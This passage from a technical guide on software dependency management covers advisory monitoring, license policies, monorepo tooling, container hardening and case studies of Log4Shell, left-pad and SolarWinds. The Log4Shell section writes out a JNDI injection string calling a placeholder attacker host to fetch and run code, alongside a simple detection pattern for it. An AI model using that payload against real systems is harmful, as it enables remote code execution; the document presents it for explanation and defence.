  • Vendor security bulletins: AWS Security Bulletins, GCP Security Bulletins, etc.
  • Package ecosystem advisories: npm advisories, PyPI vulnerabilities
  • Mailing lists: oss-security, vendor-specific lists

Automated monitoring setup:

# GitHub Advisory Database via GraphQL
query {
  securityVulnerabilities(first: 10, ecosystem: NPM, package: "express") {
    nodes {
      advisory {
        summary
        severity
        publishedAt
      }
      vulnerableVersionRange
      firstPatchedVersion {
        identifier
      }
    }
  }
}

Tools like Snyk, Socket, and GitHub Dependabot automate this monitoring and create actionable pull requests.

Alert fatigue prevention:

You’ll get many vulnerability notifications. Most won’t be critical. Filtering reduces noise:

  • Suppress low severity in non-critical systems
  • Require exploitability analysis for medium severity
  • Immediate alerts for critical/high in production dependencies
  • Weekly digests for development dependencies

Example notification policy:

{
  "production_dependencies": {
    "critical": "immediate_page",
    "high": "immediate_slack",
    "medium": "daily_email",
    "low": "weekly_digest"
  },
  "dev_dependencies": {
    "critical": "immediate_slack",
    "high": "daily_email",
    "medium": "weekly_digest",
    "low": "suppress"
  }
}

The goal is to ensure critical alerts get immediate attention without drowning teams in noise.
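A policy table like the one above can be enforced mechanically. Here is a minimal routing sketch in Python; the channel names mirror the example JSON and are placeholders for whatever paging/chat/email integrations you actually use:

```python
# Route a vulnerability alert to a notification channel based on the
# policy table above. Channel names are hypothetical labels.
POLICY = {
    "production_dependencies": {
        "critical": "immediate_page",
        "high": "immediate_slack",
        "medium": "daily_email",
        "low": "weekly_digest",
    },
    "dev_dependencies": {
        "critical": "immediate_slack",
        "high": "daily_email",
        "medium": "weekly_digest",
        "low": "suppress",
    },
}

def route_alert(dependency_type: str, severity: str) -> str:
    """Return the channel for an advisory; unknown inputs fall back to digest."""
    return POLICY.get(dependency_type, {}).get(severity.lower(), "weekly_digest")
```

The fallback matters: an advisory with an unrecognized severity should degrade to a digest, not disappear silently.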

License Compliance and Legal Risk

Software licenses are contracts. Violating them exposes your organization to legal liability, forced code disclosure, and financial penalties.

Copyleft vs Permissive Licenses

Permissive licenses (MIT, Apache 2.0, BSD):

  • Use in commercial software
  • Modify the code
  • Distribute as open source or proprietary
  • Requirements: preserve copyright notices, include license text

These are safe for commercial use with minimal restrictions.

Copyleft licenses (GPL, AGPL, LGPL):

  • Use in your software
  • Modify the code
  • Distribute - BUT you must provide source code under the same license
  • Strong copyleft (GPL, AGPL): Your entire application becomes GPL
  • Weak copyleft (LGPL, MPL): Only modifications to the library must be released

GPL implications for commercial software:

If you use a GPL library and distribute your software, you must:

  1. Provide source code to recipients
  2. License your code under GPL
  3. Allow recipients to modify and redistribute

This is incompatible with proprietary distribution models. You can use GPL software internally or behind a network service (running code on your own servers is not distribution), but not in products whose binaries you ship to customers.

AGPL is stricter: If you use AGPL code in a network service (SaaS), users accessing your service over a network count as recipients. You must provide source code even though you’re not distributing binaries.

MongoDB switched from AGPL to Server Side Public License (SSPL) to prevent cloud providers from offering managed MongoDB without contributing back. Elastic did similar with Elasticsearch. These licenses are not OSI-approved and have unclear legal status.

License Compatibility

Some licenses don’t mix well:

GPL + MIT: Compatible. GPL is stronger, final distribution is GPL.

Apache 2.0 + GPL v2: Incompatible. Apache 2.0 has patent grant provisions GPL v2 doesn’t. Use GPL v3 instead.

Multiple GPL versions: GPL v2 “only” and GPL v3 are incompatible unless GPL v2 code specifies “v2 or later.”

Proprietary + GPL: Incompatible unless you’re not distributing.

License compatibility matrices exist, but the safest approach for commercial software is to avoid copyleft licenses entirely.
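The pairwise rules above can be captured in a small lookup table. This is an illustrative sketch using SPDX-style identifiers, not legal advice; the "Proprietary + GPL" pairing assumes you are distributing:

```python
# Minimal license-compatibility lookup encoding the rules above.
# Pairs are unordered, so frozensets serve as keys.
INCOMPATIBLE = {
    frozenset({"Apache-2.0", "GPL-2.0-only"}),
    frozenset({"GPL-2.0-only", "GPL-3.0-only"}),
    frozenset({"Proprietary", "GPL-2.0-only"}),  # when distributing
    frozenset({"Proprietary", "GPL-3.0-only"}),  # when distributing
}

def compatible(a: str, b: str) -> bool:
    """Conservative check: unknown pairs are treated as compatible here,
    but a real policy should default unknown pairs to manual review."""
    return frozenset({a, b}) not in INCOMPATIBLE
```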

License Scanning Automation

Manual license review doesn’t scale. Automated scanning catches violations before they reach production.

FOSSA (commercial):

  • Scans codebases for dependencies and licenses
  • Checks for license conflicts
  • Generates compliance reports
  • Integrates with CI/CD to block non-compliant PRs
# .fossa.yml
version: 3
targets:
  only:
    - type: npm
policy:
  deny:
    - GPL-2.0
    - GPL-3.0
    - AGPL-3.0
  warn:
    - LGPL-2.1
    - LGPL-3.0

license-checker (open source, npm):

npx license-checker --summary

# Fail CI if GPL found
npx license-checker --failOn "GPL"

syft + grype (open source, multi-language):

# Generate SBOM with licenses
syft packages dir:. -o json > sbom.json

# Check for forbidden licenses
cat sbom.json | jq '.artifacts[] | select(.licenses[].value | contains("GPL"))'

Integration with CI prevents violations:

# GitHub Actions
- name: License scan
  run: |
    npm install -g license-checker
    license-checker --failOn "GPL;AGPL;SSPL"

Before launch, legal review should cover:

  1. Dependency inventory: Complete list with versions and licenses
  2. License analysis: Identification of copyleft, commercial, or custom licenses
  3. Attribution compliance: Proper copyright notices included
  4. Distribution method: Clarify whether you’re distributing software or providing SaaS
  5. Source code disclosure obligations: What must be disclosed under copyleft licenses
  6. Patent grants: Understanding patent license provisions (Apache 2.0, GPL v3)
  7. Commercial dependency terms: Review SLAs, usage limits, indemnification clauses

SBOM generation for legal review:

# CycloneDX format (industry standard)
cyclonedx-cli generate -o legal-review-sbom.xml

# SPDX format (Linux Foundation standard)
syft packages -o spdx-json > legal-review-sbom.json

Provide this to legal counsel along with:

  • Description of how each dependency is used
  • Whether dependencies are modified
  • Distribution model (binary distribution, SaaS, internal use only)

Open source compliance policies:

Many organizations maintain approved/denied license lists:

Approved for any use:

  • MIT
  • Apache 2.0
  • BSD (2-clause, 3-clause)
  • ISC

Approved with review:

  • LGPL 2.1, 3.0 (for dynamic linking only)
  • MPL 2.0 (for unmodified libraries)

Prohibited:

  • GPL 2.0, 3.0
  • AGPL 3.0
  • SSPL
  • Commons Clause
  • Any “source available” non-OSI licenses

Having clear policies prevents developers from accidentally introducing problematic licenses.
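An approved/denied list like this is easy to enforce in CI. A minimal classifier sketch, assuming SPDX license identifiers as produced by most SBOM tools:

```python
# Classify a license against the approved/review/prohibited lists above.
APPROVED = {"MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "ISC"}
NEEDS_REVIEW = {"LGPL-2.1-only", "LGPL-3.0-only", "MPL-2.0"}
PROHIBITED = {"GPL-2.0-only", "GPL-3.0-only", "AGPL-3.0-only", "SSPL-1.0"}

def classify(license_id: str) -> str:
    if license_id in PROHIBITED:
        return "prohibited"
    if license_id in NEEDS_REVIEW:
        return "review"
    if license_id in APPROVED:
        return "approved"
    return "unknown"  # unlisted licenses default to manual review
```

Note the ordering: the prohibited check comes first, and anything unlisted falls through to "unknown" rather than being silently approved.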

Monorepo Dependency Management

Monorepos (single repository containing multiple projects) create unique dependency management challenges.

Internal Dependency Graphs

In a monorepo, projects depend on each other. Changes to shared libraries affect downstream consumers.

Example structure:

monorepo/
├── packages/
│   ├── core/           # Shared utilities
│   ├── auth/           # Authentication library (depends on core)
│   ├── api/            # API service (depends on auth, core)
│   ├── web/            # Web app (depends on api, auth, core)
│   └── mobile/         # Mobile app (depends on api, auth, core)

Dependency management strategies:

1. Workspace dependencies (npm/yarn/pnpm workspaces):

// packages/api/package.json
{
  "dependencies": {
    "@company/core": "workspace:*",
    "@company/auth": "workspace:*"
  }
}

Workspaces link local packages during development. Changes to @company/core are immediately available to api without publishing.

2. Version pinning vs version ranges:

Pinned versions: All packages use exact versions of internal dependencies.

{
  "dependencies": {
    "@company/core": "1.2.3"
  }
}

Pros: Explicit, predictable, easier to reason about changes
Cons: Requires version bumps across packages for every change

Version ranges: Packages specify compatible versions.

{
  "dependencies": {
    "@company/core": "^1.2.0"
  }
}

Pros: Automatic updates within range, less version churn
Cons: A range can silently pick up new releases with unexpected behavior

Most monorepos use workspace protocol during development and publish with exact versions.
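The semantics of a caret range can be made concrete with a few lines of code. This sketch handles only major versions ≥ 1 (npm's caret behaves differently for 0.x versions, where it pins the minor instead):

```python
# Minimal check of a caret range like "^1.2.0" against a version string.
# Real tools use full semver libraries; this ignores pre-release tags
# and 0.x caret semantics.
def satisfies_caret(version: str, range_spec: str) -> bool:
    base = tuple(int(x) for x in range_spec.lstrip("^").split("."))
    v = tuple(int(x) for x in version.split("."))
    # Same major, and at or above the floor the range names.
    return v[0] == base[0] and v >= base
```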

3. Circular dependency detection:

# Using madge
npx madge --circular packages/*/src

# Using dependency-cruiser
npx depcruise --validate .dependency-cruiser.js packages

Circular dependencies indicate architectural problems. Resolve by extracting shared code or inverting dependencies.
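What these tools compute is essentially a topological sort of the internal graph. A sketch using Python's standard-library graphlib and the example monorepo structure above:

```python
from graphlib import TopologicalSorter

# Internal dependency graph from the example monorepo: package -> its deps.
GRAPH = {
    "core": set(),
    "auth": {"core"},
    "api": {"auth", "core"},
    "web": {"api", "auth", "core"},
    "mobile": {"api", "auth", "core"},
}

def build_order(graph):
    """Return a valid build order; raises graphlib.CycleError if the
    graph contains a circular dependency."""
    return list(TopologicalSorter(graph).static_order())
```

The same call doubles as a cycle detector: a circular dependency makes static_order raise instead of returning an order.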

Build Orchestration and Caching

When core changes, you need to rebuild everything that depends on it - but only those things.

Tools for monorepo builds:

Turborepo:

// turbo.json
{
  "pipeline": {
    "build": {
      "dependsOn": ["^build"],
      "outputs": ["dist/**"]
    },
    "test": {
      "dependsOn": ["build"],
      "outputs": []
    }
  }
}

Running turbo run build builds packages in dependency order, caching results. If core hasn’t changed, it uses cached build. If core changed, it rebuilds core and everything depending on it.

Nx:

# Build only affected packages
nx affected:build --base=main

# Test only affected packages
nx affected:test --base=main

Nx analyzes git diffs to determine what changed and only rebuilds/tests affected packages.
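The "affected" computation is a reverse reachability query: given a changed package, find everything downstream of it. A self-contained sketch using the example monorepo graph (a real tool derives the changed set from the git diff):

```python
# Given an internal graph (package -> deps) and a changed package,
# find every package that must be rebuilt: the reverse closure.
GRAPH = {
    "core": set(),
    "auth": {"core"},
    "api": {"auth", "core"},
    "web": {"api", "auth", "core"},
    "mobile": {"api", "auth", "core"},
}

def affected(graph, changed):
    # Invert the graph: dependency -> packages that depend on it.
    rev = {pkg: set() for pkg in graph}
    for pkg, deps in graph.items():
        for dep in deps:
            rev[dep].add(pkg)
    # Walk dependents transitively from the changed package.
    seen, stack = set(), [changed]
    while stack:
        pkg = stack.pop()
        for dependent in rev[pkg] - seen:
            seen.add(dependent)
            stack.append(dependent)
    return seen
```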

Bazel (Google’s build system):

Extremely sophisticated with hermetic builds and remote caching. Used by Google, Uber, and others at massive scale. High complexity cost - worth it at Google scale, overkill for most teams.

Internal Package Publishing

Should you publish internal packages to a registry, or only use workspace links?

Workspace-only approach:

  • All packages always use local versions
  • Simple mental model
  • Requires monorepo access to consume packages

Registry publishing approach:

  • Packages published to private registry (npm, Artifactory)
  • Other teams/projects can depend on packages without monorepo access
  • Versioning communicates API stability

Hybrid approach (common):

  • Development uses workspace links
  • CI publishes to registry
  • External consumers use registry
  • Internal consumers use workspace

Automation example:

# GitHub Actions
- name: Publish changed packages
  run: |
    npx lerna publish --yes --conventional-commits
  env:
    NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

Lerna and Changesets automate versioning and publishing based on semantic commits.

Dependency Deduplication

Monorepos with multiple packages can install the same dependency multiple times at different versions.

node_modules/
├── lodash@4.17.21          # Hoisted copy, used by package B
├── packages/
│   ├── a/node_modules/
│   │   └── lodash@4.17.15  # Older version pinned by package A

This increases bundle size and can cause runtime issues if packages interact through shared dependencies.

Deduplication strategies:

# npm
npm dedupe

# yarn
yarn dedupe

# pnpm (automatic deduplication)
pnpm install

Forcing single versions:

// package.json resolutions (yarn/pnpm)
{
  "resolutions": {
    "lodash": "4.17.21"
  }
}

// package.json overrides (npm 8.3+)
{
  "overrides": {
    "lodash": "4.17.21"
  }
}

This forces all packages to use the same version. Be cautious - if a package depends on specific behavior from an old version, forcing an upgrade can break it.
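Before forcing a resolution, it helps to know which packages are actually duplicated. A small sketch that takes (name, version) pairs, such as those you might parse out of a lock file, and reports anything installed at more than one version:

```python
from collections import defaultdict

# Detect packages installed at multiple versions. Input is an iterable of
# (name, version) pairs; the lock-file parsing itself is out of scope here.
def find_duplicates(installed):
    versions = defaultdict(set)
    for name, version in installed:
        versions[name].add(version)
    return {name: sorted(v) for name, v in versions.items() if len(v) > 1}
```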

Runtime Dependencies and Container Security

Your application’s dependencies don’t end at libraries. The container base image, language runtime, and system packages are dependencies too.

Container Base Image Selection

Base image choices from least to most minimal:

1. Ubuntu/Debian: Full OS with package manager

  • Size: 100+ MB
  • Packages: Thousands available
  • Use case: Complex apps needing system tools
  • Risk: Large attack surface

2. Alpine: Minimal Linux with musl libc

  • Size: 5 MB
  • Packages: Limited but sufficient for most apps
  • Use case: Most containerized apps
  • Risk: musl libc incompatibility with some C libraries

3. Distroless: No package manager, minimal OS

  • Size: 10-50 MB
  • Packages: None (only runtime)
  • Use case: Security-sensitive deployments
  • Risk: Debugging is hard (no shell)

4. Scratch: Empty container

  • Size: 0 MB (only your binary)
  • Packages: None
  • Use case: Static binaries (Go, Rust)
  • Risk: No OS utilities at all

Security implications:

Ubuntu base image includes hundreds of packages. Each is a potential vulnerability. CVE scanners regularly find vulnerabilities in base images.

Example scan results:

$ trivy image node:18
Total: 487 (CRITICAL: 12, HIGH: 89, MEDIUM: 157, LOW: 229)

$ trivy image node:18-alpine
Total: 0 (CRITICAL: 0, HIGH: 0, MEDIUM: 0, LOW: 0)

The Alpine image reported zero vulnerabilities in this scan because it contains almost nothing beyond Node.js - there is simply far less for a scanner to flag.

Migration strategy:

# Before: Full Ubuntu base
FROM node:18
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
CMD ["node", "server.js"]

# After: Multi-stage with distroless
FROM node:18 AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
COPY . .

FROM gcr.io/distroless/nodejs18-debian11
WORKDIR /app
COPY --from=builder /app /app
CMD ["server.js"]

The distroless image has no shell, no package manager, no unnecessary binaries. Only Node.js and your app. Vulnerabilities drop dramatically.

Language Runtime Security

Your language runtime (Node.js, Python, JRE) is a dependency with its own vulnerabilities.

Node.js example:

CVE-2023-30581: Undici (Node.js HTTP client) vulnerability allowing CRLF injection. Fixed in Node 20.2.0, 18.16.1, 16.20.1.

If you’re running Node 18.15.0 in production, you’re vulnerable even if you update all npm packages. The runtime itself has the vulnerability.
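Checking whether a runtime meets the patched floor for its major line is simple enough to automate. A sketch using the fix versions from the advisory above:

```python
# First patched release per Node.js major line, from the Undici advisory
# (CVE-2023-30581): 16.20.1, 18.16.1, 20.2.0.
PATCHED = {16: (16, 20, 1), 18: (18, 16, 1), 20: (20, 2, 0)}

def is_patched(version: str) -> bool:
    """True if the running version is at or above the patched floor
    for its major line; unknown majors are treated as unpatched."""
    v = tuple(int(x) for x in version.split("."))
    floor = PATCHED.get(v[0])
    return floor is not None and v >= floor
```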

Mitigation:

  1. Pin major versions, update minors automatically:
FROM node:18
# Gets latest 18.x automatically when rebuilt

Pros: Security patches applied automatically
Cons: Minor versions can introduce breaking changes

  2. Pin exact versions, update deliberately:
FROM node:18.16.1

Pros: Predictable, controlled updates
Cons: Must monitor for security updates and update manually

  3. Use security-focused base images:
FROM chainguard/node:latest
# Chainguard maintains minimal, frequently patched images

Python example:

CVE-2023-24329: URL parsing vulnerability in Python < 3.11.3. Attackers could bypass URL blocklists.

If you’re using Python 3.10.10, your URL validation is vulnerable.

Java example:

Log4Shell affected the entire Java ecosystem because Log4j is ubiquitous. The fix required updating the dependency itself; newer JRE versions restricted remote JNDI class loading by default, which narrowed the gadget-chain exploits but was never a complete mitigation on its own.

Runtime update schedule:

  • Language runtimes: Monthly rebuild to get latest patches
  • Critical vulnerabilities: Immediate update
  • Major version upgrades: Quarterly evaluation, annual migrations

Vulnerability Scanning in CI/CD

Scanning should happen before images reach production.

Trivy integration:

# GitHub Actions
- name: Build image
  run: docker build -t myapp:${{ github.sha }} .

- name: Scan for vulnerabilities
  uses: aquasecurity/trivy-action@master
  with:
    image-ref: myapp:${{ github.sha }}
    exit-code: 1  # Fail build on vulnerabilities
    severity: CRITICAL,HIGH

- name: Push image
  if: success()
  run: docker push myapp:${{ github.sha }}

This prevents vulnerable images from being pushed to registry.

Grype (alternative scanner):

- name: Scan with Grype
  run: |
    curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh
    grype myapp:${{ github.sha }} --fail-on high

Snyk container scanning:

- name: Snyk container scan
  uses: snyk/actions/docker@master
  env:
    SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
  with:
    image: myapp:${{ github.sha }}
    args: --severity-threshold=high

Handling scan failures:

Scanners will find vulnerabilities. Not all require immediate action:

  • Critical/High in production code paths: Block deployment, fix immediately
  • Critical/High in unused code: Create ticket, fix within SLA
  • Medium/Low: Aggregate report, fix in next sprint
  • False positives: Document suppression with justification

Example suppression file (Trivy):

# .trivyignore
CVE-2023-12345  # False positive: code path not used
CVE-2023-67890  # Accepted risk: no fix available, mitigated by WAF

Document why you’re suppressing. Future you (and auditors) will want to know.
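Because suppressions are audit material, it's worth parsing them with their justifications intact rather than just the CVE IDs. A sketch for the .trivyignore-style format shown above:

```python
# Parse a .trivyignore-style file, keeping each CVE's justification
# comment so suppressed findings stay auditable.
def parse_ignores(text):
    ignores = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and full-line comments
        cve, _, justification = line.partition("#")
        ignores[cve.strip()] = justification.strip()
    return ignores
```

A CI step could then fail when any entry has an empty justification, enforcing the "document why" rule mechanically.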

Minimal Container Images

The fewer packages in your container, the fewer vulnerabilities. Ruthlessly minimize.

Multi-stage builds for size and security:

# Build stage: full tools
FROM node:18 AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
RUN npm run build

# Production stage: minimal
FROM gcr.io/distroless/nodejs18-debian11
WORKDIR /app
COPY --from=builder /app/dist ./dist
COPY --from=builder /app/node_modules ./node_modules
COPY package.json ./
CMD ["dist/server.js"]

The final image contains only runtime artifacts. Build tools, source code, and intermediate files aren’t included.

Static binary approach (Go, Rust):

# Build stage
FROM rust:1.70 AS builder
WORKDIR /app
COPY . .
RUN cargo build --release

# Production: scratch (empty container)
FROM scratch
COPY --from=builder /app/target/release/myapp /myapp
CMD ["/myapp"]

The final image is just your binary. No OS, no shell, no packages. Attack surface is minimal.

Debugging minimal containers:

Distroless and scratch images have no shell. Debugging requires ephemeral containers:

# Run debugging container with access to app filesystem
kubectl debug pod/myapp -it --image=busybox --target=myapp

# Or use debug images
docker run --rm -it --pid=container:<id> --net=container:<id> \
  nicolaka/netshoot

You get debugging tools without including them in production images.

Case Studies: Learning from Dependency Disasters

Real incidents teach lessons theory can’t.

Log4Shell: The 0-Day That Broke the Internet

December 9, 2021: CVE-2021-44228 published. Log4j, a ubiquitous Java logging library, had remote code execution via JNDI injection.

The vulnerability:

Log4j would evaluate expressions in log messages. An attacker could get ${jndi:ldap://attacker.com/Exploit} into any log message and Log4j would fetch and execute code from the attacker’s server.

Triggering it was trivial:

// User-controlled input
log.info("User logged in: {}", username);

// If username is: ${jndi:ldap://attacker.com/Exploit}
// Log4j fetches and executes Exploit.class from attacker server
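A crude first-pass detector for this pattern, of the kind many teams deployed in WAF rules while patching, can be sketched in a few lines. Real attacks quickly moved to obfuscated variants like ${${lower:j}ndi:...}, so pattern matching was only ever a stopgap alongside upgrading:

```python
import re

# Simplified detector for JNDI lookup strings in untrusted input.
# Case-insensitive, but deliberately naive: nested-lookup obfuscations
# bypass it, which is why patching was the real fix.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

def looks_like_log4shell(payload: str) -> bool:
    return bool(JNDI_PATTERN.search(payload))
```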

Why it was so bad:

  1. Ubiquity: Log4j is in thousands of Java applications and services
  2. Transitive dependencies: Even if you didn’t use Log4j directly, your dependencies did
  3. Embedded in products: Vendor products contained vulnerable Log4j (Minecraft, VMware, Cisco, etc.)
  4. Easy to exploit: Attackers automated scans, exploits appeared within hours
  5. Multiple patches needed: Initial fix (2.15.0) was incomplete, required three iterations

Response patterns:

Organizations that handled it well:

  • Had asset inventory (knew where Log4j was deployed)
  • Could deploy mitigations quickly (environment variables, WAF rules)
  • Had emergency patching process (bypassed normal change approval)
  • Communicated status to customers proactively

Organizations that struggled:

  • Didn’t know what Java applications they were running
  • Couldn’t identify Log4j versions in dependencies
  • Required weeks for change approval
  • Discovered vulnerable systems only after being compromised

Lessons:

  1. Maintain SBOMs: You can’t patch what you don’t know you have
  2. Practice emergency response: Log4Shell won’t be the last critical 0-day
  3. Monitor transitive dependencies: Direct dependencies are just the tip of the iceberg
  4. Have emergency procedures: Normal change control doesn’t work for active exploitation
  5. Layer defenses: WAF rules bought time while patches were deployed

Technical mitigation timeline:

# Day 0: Emergency mitigation
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

# Day 1: Upgrade to 2.15.0
# Update all pom.xml, build.gradle with:
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.15.0</version>
</dependency>

# Day 6: 2.15.0 insufficient, upgrade to 2.16.0
# Day 11: Final fix, upgrade to 2.17.0

Organizations that could deploy these changes in hours weathered the storm. Those that needed weeks were compromised.

left-pad: The 11-Line Package That Broke npm

March 22, 2016: A developer unpublished left-pad, an 11-line npm package, from the registry. Thousands of builds failed instantly.

The package:

module.exports = function leftPad(str, len, ch) {
  str = String(str);
  ch = ch || ' ';
  var i = -1;
  len = len - str.length;
  while (++i < len) {
    str = ch + str;
  }
  return str;
};

Eleven lines of code. Depended on by Babel, React, and thousands of other packages through transitive dependencies.

What happened:

  1. Developer published a package named kik
  2. Kik (the company) asked npm to transfer the package name
  3. npm transferred the package without developer consent (trademark policy)
  4. Developer unpublished all his packages in protest, including left-pad
  5. Thousands of builds started failing: npm ERR! 404 'left-pad' is not in the npm registry

npm’s response:

npm restored left-pad within hours and changed policies to prevent unpublishing packages with dependents. But the damage was done - the internet learned that tiny dependencies could break everything.

Lessons:

  1. Transitive dependency risk: You depend on code you’ve never heard of
  2. Single points of failure: One developer, one decision, global impact
  3. Dependency pinning helps: Projects using npm-shrinkwrap.json (now package-lock.json) weren’t affected - they had exact versions cached
  4. Vendor policies matter: npm’s unpublish policy was a systemic risk
  5. Micro-dependencies are technical debt: Is depending on 11 lines worth the risk?

Cultural impact:

left-pad sparked debates about:

  • Micro-dependencies vs vendoring simple code
  • npm’s role as critical infrastructure
  • Developer rights vs ecosystem stability
  • The bus factor of open source maintenance

Many developers started questioning whether importing a library for simple functionality was worth the dependency risk. Others defended composition of small, tested modules.

Both perspectives are valid. The lesson is to make conscious choices, not default to installing packages for everything.

SolarWinds: Supply Chain Attack in the Wild

December 2020: SolarWinds Orion software contained malware distributed through official updates. It’s considered one of the most sophisticated supply chain attacks ever.

The attack:

  1. Attackers compromised SolarWinds build system (exact method unclear, likely credential theft or insider access)
  2. Injected malicious code into Orion software updates
  3. Malware was digitally signed with SolarWinds’ legitimate certificate
  4. 18,000 organizations installed the compromised update
  5. Attackers selected ~100 high-value targets for deeper exploitation
  6. Victims included US government agencies, Fortune 500 companies, security firms

Why it worked:

Trust in vendor updates: Organizations trust signed updates from legitimate vendors. SolarWinds’ signature was valid.

Build system compromise: The attack occurred during build, not in source code. Code reviews wouldn’t have caught it.

Subtle persistence: The malware laid dormant for weeks, then communicated via legitimate-looking DNS queries.

Good operational security: Attackers used VPNs, rotating infrastructure, and careful target selection to avoid detection.

Lessons for dependency management:

  1. Vendor code is still third-party code: Trust but verify, even for commercial software
  2. Build system security is critical: Compromise at build time defeats source code audits
  3. Behavioral monitoring matters: Static analysis won’t catch sophisticated runtime behavior
  4. Network segmentation limits blast radius: The malware tried to access cloud services; segmented networks reduced impact
  5. Incident response capabilities: Organizations with good logging and monitoring detected anomalies faster

What changed:

  • Executive Order 14028 (US): Mandated SBOMs for government software
  • Increased focus on software supply chain security
  • Adoption of SLSA framework
  • Renewed interest in reproducible builds and build provenance
  • Vendor security questionnaires now ask about build system security

Practical implications:

Even if you’re not a government contractor, SolarWinds-style attacks affect everyone:

  • Your monitoring tools could be compromised
  • Your CI/CD tools could be compromised
  • Your vendors’ update mechanisms could be compromised

Mitigations:

  • Monitor outbound connections for unexpected behavior
  • Segment networks so compromised workstations can’t access everything
  • Review SBOMs for unexpected dependencies
  • Maintain offline backups immune to network-based compromise
  • Practice incident response for supply chain scenarios

Putting It All Together: A Dependency Review Framework

Systematic dependency review requires checklists, tooling, and processes.

Initial Dependency Assessment

Before adding a new dependency:

1. Necessity check:

  • Can I implement this in reasonable time?
  • What’s the maintenance burden of implementing vs depending?
  • Is this dependency doing something complex or something trivial?

Rule of thumb: If you can implement it in under 100 lines and it’s not security-critical (crypto, auth), consider implementing it. If it’s complex (OAuth, image processing, PDF generation), depend on a library.

2. Quality evaluation:

  • Stars/downloads: Popularity indicates community scrutiny
  • Recent commits: Active maintenance or abandoned?
  • Open issues: Responsiveness to bugs and security reports?
  • Dependencies: What are you transitively importing?
  • Bundle size: Is this pulling in massive dependencies for simple functionality?

3. Security assessment:

  • Known vulnerabilities: Run npm audit or Snyk scan
  • Security policy: Does the project have a SECURITY.md with disclosure process?
  • Security track record: History of vulnerabilities and response quality
  • Code quality: Brief review for obvious issues (eval, SQL injection, etc.)

4. Legal review:

  • License type: Compatible with your project?
  • License propagation: Will this force your code to change licenses?
  • Patent clauses: Apache 2.0 has patent grant, others don’t
  • Commercial restrictions: Some licenses prohibit commercial use

5. Maintenance considerations:

  • Breaking change frequency: Stable API or constant churn?
  • Migration path: If we need to replace this, how hard is it?
  • Alternative libraries: Backup options if this gets abandoned?
  • Bus factor: How many active maintainers?

Ongoing Monitoring

Dependencies aren’t fire-and-forget. Continuous monitoring prevents drift into dangerous states.

Weekly:

  • Review Dependabot/Renovate PRs
  • Triage new security advisories
  • Merge automated patch updates that passed CI

Monthly:

  • Scan for new vulnerabilities across all environments
  • Review dependency update policy effectiveness
  • Update pinned dependencies to latest stable

Quarterly:

  • Full dependency audit: are we still using everything?
  • License compliance check
  • Evaluate new alternatives for problematic dependencies
  • Review vendor SLAs and usage approaching limits

Annually:

  • Major version update planning
  • Dependency reduction effort (remove unused, consolidate duplicates)
  • Legal review for license compliance
  • Vendor contract renewals and SLA renegotiation

Dependency Policy Template

Establish clear policies so developers know what’s acceptable:

# Dependency Policy

## Approval Requirements

**Auto-approved:**
- Permissive licenses (MIT, Apache 2.0, BSD, ISC)
- High-quality packages (>100k downloads/week, active maintenance)
- Patch/minor updates to existing dependencies

**Requires review:**
- New direct dependencies
- Major version updates
- Weak copyleft licenses (LGPL, MPL) - must be dynamically linked
- Commercial/proprietary dependencies

**Prohibited:**
- Strong copyleft (GPL, AGPL) in any distributed code
- Unmaintained packages (no commits in 2+ years)
- Packages with known critical vulnerabilities
- Packages without licenses

## Security Standards

**All dependencies must:**
- Have no known critical/high vulnerabilities
- Be from verified publishers (npm, Maven Central, PyPI)
- Use lock files with integrity hashes
- Pass automated security scans in CI

**Critical dependencies must:**
- Have multiple active maintainers
- Have public security disclosure process
- Be monitored for security advisories
- Have documented alternatives if replacement needed

## Operational Requirements

**Developers must:**
- Document why each dependency was chosen
- Update dependencies monthly
- Respond to Dependabot security PRs within 48 hours
- Test updates in staging before production

**CI must:**
- Run vulnerability scans on every build
- Block deployment of critical/high vulnerabilities
- Generate SBOM for each release
- Verify license compliance

Adapt this to your organization’s risk tolerance and regulatory requirements.

Final Thoughts

Dependency management is risk management. Every dependency is a trade-off: functionality and velocity in exchange for coupling, security surface, and maintenance burden.

The developers who handle this well aren’t the ones who avoid dependencies - that’s impractical in modern software development. They’re the ones who:

  • Make conscious choices about what they depend on
  • Maintain visibility into their dependency graph
  • Have systems to respond when dependencies fail or become compromised
  • Balance risk against pragmatism

You don’t need to achieve SLSA 4 or scan every single dependency of every dependency. You need to know what you depend on, monitor for critical vulnerabilities, and respond quickly when necessary.

The incidents that make headlines - Log4Shell, left-pad, SolarWinds - weren’t caused by sophisticated attacks that no one could prevent. They succeeded because organizations didn’t know what they were running, couldn’t respond quickly, or had no emergency procedures.

Build those capabilities. Maintain your inventory. Practice your response. Make dependency review a discipline, not a checklist you ignore until something breaks.

Your dependencies are your supply chain. Treat them with the same rigor you treat any other operational risk.
